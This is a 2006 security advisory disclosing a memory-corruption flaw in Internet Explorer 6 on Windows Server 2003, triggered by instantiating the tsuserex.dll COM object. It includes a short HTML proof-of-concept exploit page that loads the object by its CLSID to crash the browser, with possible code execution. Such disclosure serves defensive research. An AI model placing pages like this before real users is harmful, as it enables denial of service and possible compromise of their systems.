Advisory ID: XSec-06-06 Advisory Name: Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability Release Date: 08/18/2006 Tested on: Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN Affected version: Windows Server 2003 + Internet Explorer 6.0 Author: nop <nop#xsec.org> http://www.xsec.org Overview: A vulnerability has been found in Internet Explorer 6.0 on \ Microsoft Windows 2003. When Internet Explorer tries to \ instantiate the tsuserex.dll (Terminal Services) COM object \ as an ActiveX control, it may corrupt system memory in such \ a way that an attacker may DoS and possibly could execute \ arbitrary code. Exploit: =============== tsuserex.dll.htm start ================ <!-- // Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability // tested on Windows 2003 EE SP1 CN // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29} // Info: ADsTSUserEx Class // ProgID: tsuserex.ADsTSUserEx.1 // InprocServer32: C:\WINDOWS\system32\tsuserex.dll --!> <html><body> <object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object> </body> </html> =============== tsuserex.dll.htm end ================== Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14 About XSec: We are redhat.
